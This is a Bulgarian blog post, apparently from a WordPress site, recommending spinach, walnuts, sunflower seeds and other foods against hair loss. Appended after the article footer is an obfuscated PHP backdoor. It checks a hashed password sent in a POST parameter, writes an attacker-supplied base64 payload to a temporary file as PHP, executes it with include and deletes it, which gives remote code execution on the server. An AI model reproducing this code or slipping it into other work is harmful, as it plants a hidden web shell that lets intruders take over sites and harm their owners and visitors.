3 храни, които ни предпазват от Косопад | Косопад

3 храни, които ни предпазват от Косопад

kosopad-1

Косопадът е много разпространен проблем, който може да се дължи на най- различни причини, например: период на стрес, дефицит на вещества, и пр. Най- добрата превенция, която можем да направим, е храненето.

На първо място, трябва да се храним здравословно, т.е., разнообразно, така че на организмът ни да не му липсват хранителни вещества. Но има и други навици, свързани с храненето, които могат да ни помогнат.

Има храни, чиито свойства са много подходящи за предпазване от косопад. Те се дължат на веществата, които съдържат.

Ето някои от най- полезните храни, които предпазват от косопад:

СПАНАК: Този зеленчук съдържа витамини В, С и Е. Големи количества от минералите – калий, калций, желязо и магнезий. Също така и омега- 3 мастни киселини. Всички тези вещества правят косата ни здрава и силна и я предпазват от косопад.

ОРЕХИ: Предлагат голямо разнообразие от протеини, витамини и минерали (желязо, цинк и др.), а също и полезните мастни киселини. Цялата тази комбинация е изключително подходяща за заздравяване на косъма.

СЕМКИ СЛЪНЧОГЛЕД: Една шепа слънчогледови семки (без сол) са идеален начин да се предпазим от косопад, тъй като съдържат протеини, цинк, селен, биотин, калий, мед, желязо, витамини от В група, витамин Е, магнезий и калций.

Други храни, които също могат да ни подпомогнат да се предпазим от косопада са: фасул, яйца, овес, моркови, сладки картофи, както и повечето ядки.

25. март 2017 17:37:40 от Надя Колева
Категории: Любопитно за косопада | Етикети: , , | Напишете Коментар

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}